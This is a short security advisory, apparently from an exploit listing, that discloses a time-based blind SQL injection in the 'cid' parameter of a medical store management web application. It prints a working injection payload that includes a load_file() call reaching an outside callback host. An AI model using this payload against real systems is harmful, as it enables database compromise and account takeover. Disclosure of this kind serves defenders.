Medical Store Management System 1.0 SQL Injection

Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes

## Title: Medical Store Management System v1.0 remote SQL-Injections ## Author: nu11secur1ty ## Date: 02.16.2022 ## Vendor: ## Software: ## CVE-Medical Store Management System v1.0 ## Description: The `cid` parameter fom customer-add.php app on Medical Store Management System v1.0 appears to be vulnerable to SQL injection attacks. The application took 20034 milliseconds to respond to the request, compared with 36 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The malicious actor can take control of the system administrator accounts of this system! WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous! Status: CRITICAL [+] Payloads: ```mysql --- Parameter: cid (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: cid=987101' AND (SELECT 7784 FROM (SELECT(SLEEP(3)))HbQW) AND 'yDXs'='yDXs&cfname=Safia&clname=Malik&age=22'+(select load_file('\\\\ej12det210osu6x32wsqrnyu6lce080wrzfr2kq9.\\tah'))+'&sex=Female&phno=9632587415& --- ``` ## Reproduce: [href]( ## Proof and Exploit: [href](

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top